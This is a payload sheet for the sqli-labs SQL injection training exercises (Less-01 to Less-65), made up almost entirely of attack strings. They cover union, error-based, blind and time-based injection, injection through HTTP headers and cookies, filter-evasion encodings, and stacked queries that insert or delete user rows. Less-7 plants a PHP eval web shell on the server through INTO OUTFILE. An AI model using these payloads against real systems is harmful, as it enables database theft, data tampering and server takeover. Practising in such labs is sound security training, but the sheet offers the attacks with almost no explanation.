Less-01
http:///Less-1/
?id=-1' union select 1,database(),3 %23
Less-02
http://ip/Less-2/
?id=-1 union select 1,database(),3 %23
?id=-1 union select 1,@@basedir,@@datadir
basedir()指定了安装MYSQL的安装路径
datadir()指定了安装MYSQL的数据文件路径
Less-03
http://ip/Less-3/
?id=-1') union select 1,database(),3 %23
Less-04
http://ip/Less-4/
?id=-1") union select 1,database(),3 %23
Less-05
http://ip/Less-5/
?id=1' union select 1,count(*),concat_ws('~',database(),floor(rand()*2)) as a from
information_schema.tables group by a --+
Less-06
http://ip/Less-6/
?id=1" union select 1,count(*),concat_ws('~',database(),floor(rand()*2)) as a from information_schema.tables group by a --+
Less-07
http://ip/Less-7/
?id=1')) union select 1,2,'<?php @eval($_REQUEST["123"])?>' into outfile
"\\var\\www\\html\\Less-7\\hacker.php" --+
Less-08
http://ip/Less-8/
?id=1' and substr(database(),1,1)='s' --+
http://ip/Less-8/
?id=1' and substr(database(),1,1)>'s' --+
Less-9
http://ip/Less-9/
?id=1' and if((length(database())=8),sleep(3),0) --+
Less-10
http://ip/Less-10/
?id=1" and if((length(database())=8),sleep(3),0) --+
Less-11
http://ip/Less-11/
?id=1
uname=ad' union select user(),database()#&passwd=admin&submit=Submit
Less-12
http://ip/Less-12/
?id=1
uname=ad") union select user(),database()#&passwd=admin&submit=Submit
Less-13
http://ip/Less-13/
uname=ad') and updatexml(1,concat(0x7e,(select user()),0x7e),1)#&passwd=admin&submit=Submit
Less-14
http://ip/Less-14/
uname=admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1)#&passwd=admin&submit=Submit
Less-15
http://ip/Less-15/
uname=' or ascii(substr(@@version,1,1))<64 -- &passwd=&submit=Submit
http://ip/Less-15/
uname=' or ascii(substr(@@version,1,1))>64 -- &passwd=&submit=Submit
Less-16
http://ip/Less-16/
uname=") or ascii(substr(@@version,1,1))<64 -- &passwd=&submit=Submit
http://ip/Less-16/
uname=") or ascii(substr(@@version,1,1))>64 -- &passwd=&submit=Submit
Less-17
http://ip/Less-17/
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT
database()),0x7e),1)#&submit=Submit
Less-18
User-Agent: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or '1
Less-19
Referer: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or '
Less-20
Cookie: uname=' union select user(),2,3#
Less-21
编码前
') union select user(),2,3#
编码后
JykgdW5pb24gc2VsZWN0IHVzZXIoKSwyLDMj
Less-22
#编码前
" union select 1,2,user()#
#编码后
IiB1bmlvbiBzZWxlY3QgMSwyLHVzZXIoKSM=
Less-23
http://ip/Less-23
?id=' union select 1,database(),'3
Less-24
Less-25
http://ip/Less-25
?id=1'|| extractvalue(1,concat(0x7e,database())) -- +
Less-25a
http://ip/Less-25a
?id=-1 union select 1,database(),3 -- +
Less-26
http://ip/Less-26
?id=-1' || updatexml(1,concat(0x7e,database()),1) || '1'='1
Less-26a
#过滤负号
http://ip/Less-26a
?id=1000')%a0union%a0select%a01,user(),('3
Less-27
http://ip/Less-27
?id=-1000'unIon%a0SelEcT%a01,database(),3||'1
Less-27a
http://ip/Less-27a
?id=0" %a0 UniOn %a0 SelECT %a0 1,2,database();%00
Less-28
http://ip/Less-28
?id=0')union%a0select(1),(user()),(3)||('1
Less-28a
http://ip/Less-28a
?id=0') uNion%a0sElect 1,user(),('3
Less-29
http://ip/Less-29
?id=0&id=-1' uNion%a0sElect 1,user(),'3
Less-30
http://ip/Less-30
?id=0&id=-1" uNion%a0sElect 1,user(),"3
Less-31
http://ip/Less-31
?id=0&id=-1") uNion%a0sElect 1,user(),("3
Less-32
http://ip/Less-32
?id=0&id=-1%df%27 union select 1,user(),3 -- +
Less-33
http://ip/Less-33
?id=0&id=-1%df%27 union select 1,user(),3 -- +
Less-34
http://ip/Less-34
uname=%bb' or 1 limit 1,1#&passwd=1
Less-35
http://ip/Less-35
?id=11 and (extractvalue(1,concat(1,(select database())))) --+
Less-36
http://ip/Less-36
?id=-1%df' union select 1,2,database() --+
Less-37
http://ip/Less-36
uname=-1%df%27 union select 1,database()--+&passwd=1&submit=Submit
Less-38
http://ip/Less-38
?id=1';insert into users values(38,'less38','hello')--+
Less-39
http://ip/Less-39
?id=1;insert into users values(39,'less39','hello')--+
Less-40
http://ip/Less-40
?id=1');insert into users values(40,'Less40','hello')--+
Less-41
http://ip/Less-41
?id=1;insert into users values(41,'Less41','hello')--+
Less-42
';insert into users values(null,'adm','adm');#
Less-43
a');insert into users values(null,'adm1','adm1')#
Less-44
a';insert into users values(null,'adm2','adm2')#
Less-45
a');insert into users values(null,'adm3','adm3')#
Less-46
http://ip/Less-46
?sort=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--+
Less-47
http://ip/Less-47/
?sort=1' and extractvalue(1,concat(0x7e,database(),0x7e)) --+
Less-48
http://ip/Less-48/
?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(0.5),1) --+
Less-49
http://ip/Less-49/
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(0.5),1)--+
Less-50 (mysqli_multi_query())
http://ip/Less-50/
?sort=1 desc;insert into users values(null,'test','test');--+
Less-51
http://ip/Less-51/
?sort=1' ;delete from users where id=19;
Less-52
http://ip/Less-52/
?sort=1 desc;delete from users where id=18;
Less-53(无回显)
http://ip/Less-52/
?sort=1 desc'
http://ip/Less-52/
?sort=1 desc'; insert into users values(null,'test1','test1');
Less-53(无回显)
http://ip/Less-52/
?sort=1';
http://ip/Less-53/
?sort=1';delete from users where id=24;
Changllenge
Less-54
http://ip/Less-54/
?id=-1' union select 1,database(),3 --+
http://ip/Less-54/
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
http://ip/Less-54/
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="HIURO68RLB"),3 --+
http://ip/Less-54/
?id=-1' union select 1,(select group_concat(secret_B1JE) from HIURO68RLB),3 --+
Less-55
http://ip/Less-55/
?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
http://ip/Less-55/
?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_name="B7966YL9EE"),3 --+
http://ip/Less-55/
?id=-1) union select 1,(select group_concat(secret_IYLU) from B7966YL9EE),3 --+
Less-56
http://ip/Less-56/
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
http://ip/Less-56/
?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name="IAMTKU9YP5"),3 --+
http://ip/Less-56/
?id=-1') union select 1,(select group_concat(secret_EX3R) from IAMTKU9YP5),3 --+
Less-57
http://ip/Less-57/
?id=-1" union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
http://ip/Less-57/
?id=-1" union select 1,(select group_concat(column_name) from information_schema.columns where table_name="SHHUH6ZE8E"),3 --+
http://ip/Less-57/
?id=-1" union select 1,(select group_concat(secret_BNBI) from SHHUH6ZE8E),3 --+
Less-58
http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,database(),0x7e))--+
http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),0x7e))--+
http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="3T2NJQ3VYK"),0x7e))--+
http://ip/Less-58/
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(secret_3LQM) from 3T2NJQ3VYK),0x7e))--+
Less-59
http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),0x7e))--+
http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="G15HNN62G8"),0x7e))--+
http://ip/Less-59/
?id=1 and extractvalue(1,concat(0x7e,(select group_concat(secret_B2OI) from G15HNN62G8),0x7e))--+
Less-60
http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),0x7e))--+
http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="CPOBEOTIAA"),0x7e))--+
http://ip/Less-60/
?id=1") and extractvalue(1,concat(0x7e,(select group_concat(secret_FD8C) from CPOBEOTIAA),0x7e))--+
Less-60
http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema=database()),0x7e))--+
http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_name="XJD2PNZS5E"),0x7e))--+
http://ip/Less-61/
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_ZJU4) from XJD2PNZS5E),0x7e))--+
Less-62
http://ip/Less-62/
?id=1') and ascii(substr(database(),1,1))<115 --+
http://ip/Less-62/
?id=1') and ascii(substr(database(),1,1))>115 --+
Less-63
http://ip/Less-63/
?id=1' and ascii(substr(database(),1,1))<115 --+
http://ip/Less-63/
?id=1' and ascii(substr(database(),1,1))>115 --+
Less-64
http://ip/Less-64/
?id=1)) and ascii(substr(database(),1,1))<115--+
http://ip/Less-64/
?id=1)) and ascii(substr(database(),1,1))>115--+
Less-65
http://ip/Less-65/
?id=1") and ascii(substr(database(),1,1))<115–+
http://ip/Less-65/
?id=1") and ascii(substr(database(),1,1))>115--+